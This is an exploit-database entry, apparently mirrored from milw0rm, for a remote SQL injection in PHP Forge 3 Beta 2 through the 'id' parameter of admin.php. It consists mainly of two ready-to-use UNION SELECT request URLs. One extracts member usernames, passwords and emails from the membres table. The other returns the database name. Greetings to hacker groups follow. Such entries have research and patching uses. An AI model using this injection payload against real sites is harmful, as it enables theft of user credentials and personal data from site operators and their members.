[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP Forge 3 Beta 2 - 'id' SQL Injection

Author: JIKO
type: webapps
platform: php
port: 
date_added: 2008-04-25 
date_updated: 2016-11-24 
verified: 1 
codes: OSVDB-44840;CVE-2008-2088 
tags: 
aliases:  
screenshot_url:  
application_url: 
=========================================================
=============== JIKI TEAM [ Maroc And YameN ]===============
=========================================================
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : Forge 3.0 bêta
# Bug   : Remote SQL Injection Vulnerability
# Download  : http://membres.lycos.fr/phpforge/downloads/phpforge3b2.tar.gz
=========================JIkI Team===================
# Exploit  :
 http://[Site]/[script]/http://localhost/script/phpforge3/admin.php?module=news&p=modifier&id=-1 union select 0,identifiant,mdp,pseudo,email,description,6,7 from membres--
# Ex :
http://localhost/script/phpforge3/admin.php?module=news&p=modifier&id=-1  union  select  0,1,database(),3,4,5,6,7  from  membres--
=========================================================
 greetz:
 all my friend [kil1er & GhosT HaCkEr] and H-T Team and all No-back members and tryag.Com
 visit: www.no-back.org & www.tryag.com
=========================================================

# milw0rm.com [2008-04-26]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.